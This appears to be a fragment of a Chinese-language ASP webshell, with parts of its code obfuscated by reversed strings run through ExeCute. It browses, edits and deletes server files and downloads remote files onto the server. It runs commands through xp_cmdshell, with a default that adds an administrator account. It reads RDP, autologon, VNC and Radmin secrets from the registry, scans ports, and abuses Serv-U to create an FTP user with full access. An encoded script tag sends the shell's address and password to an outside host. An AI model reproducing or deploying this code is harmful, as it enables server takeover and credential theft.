alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1:Function EnCode(ObjStr,ObjPos):ExeCuTe Fun(")soPjbO doM rtSneL,rtSjbO(thgiR&rtSpmT=edoCnE:txeN:rtSpmT&)soPjbO,1+soPjbO*i,rtSjbO(diM=rtSpmT:1-)soPjbO/rtSneL(tnI oT 0=i roF:)rtSjbO(neL=rtSneL:rtSneL,i,rtSpmT,rtSweN miD"):End Function:Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:Function SinfoEn(ObjStr,ObjPos):ExeCuTe Fun(")2-)nEofniS(neL,nEofniS(tfeL=nEofniS:txeN:fLrCbv&)soPjbO,)i(rtSweN(edoCnE&nEofniS=nEofniS:)rtSweN(dnuoBU oT 0=i roF:)|`|,rtSjbO(tilpS=rtSweN:)||||,|~|,rtSjbO(ecalpeR=rtSjbO"):End Function:Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function:Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):ExeCute SinfoEn("thPar(deoltFGeF.=CLDFOt Se)`i=0`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`erldfoub.sLDFOn  i FchEar Fos`'>&~orolrCdeor&B ~idol spx:1errdbo='lety siv<dr>teen=cgnli a7%=1thid w10t=ghei htd~<I&=SSI~`>~/a~<e&am.N&F>~br><ntfo</>06'='zesi' gsingdin'we=ac fntfo><~~����~~e=tlti' ~)~~)&meNaF.~&~\h&at(PthPaRe~&~~r(deolwFho:Sptriscvaja='efhra ~<I&=SSI `> /ay<op>C��''��e=tlti' am='ssla c)'k(soyen uret'rk=icclon)'~~erldFopyCo~~~,~~)&meNaF.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ></b[<b>><br~<I&=SSI~`>~/al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deollFDe~~~,~~)&\~~\~,~\e,am.N&F\~&~thPae(acplRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`a></veMo'>�ƶ�='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deoleFov~M,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI~`>~td</v>di</b></>]<ba></wnDo'>����='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~ilnFow~D,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 5od m iIf~`xtNe`>~leab/t><tr</d>/t><=2htighed <tr><tr>/t~<I&=SSI`=0:i~~I=:SSIS RR`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`esil.fldFon  i LchEar Fo` ~b></>[<b> /a~<e&am.N&L>~ntfo</>25'='zesi' gsingdin'we=ac fntfo><��''��e=tlti' );~~leFiwnDo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ><~'r&loCoerrdBo~&d lisox 1pr:deor'be=ylstv di><0''3t=ghei htd~<I&=SSI`> /at<di>E��''��e=tlti' am='ssla c)'~~leFiitEd~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~illFDe~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /ay<op>C��''��e=tlti' am='ssla c)'~~leFipyCo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~` ~ -b></>]<b> /ae<ov>M��''��e=tlti' am='ssla c)'~~leFiveMo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`>~<br><b~K)&2410e/iz.s(LngclI&=SSI` ~ -i> <b></&~peTyL.I&=SSI`>~td</v>di</i></&~edfidiMostLateDaL.I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 2od m iIf~`xtNe`e>blta</r>/t~<I& SRS R~`nghiot=NLDFOt Se",Pos):End function:Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:RRS ""&copyurl&""
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user super super /add & net localgroup administrators super /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&Serveru&chr(38)&chr(112)&chr(61)&Serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
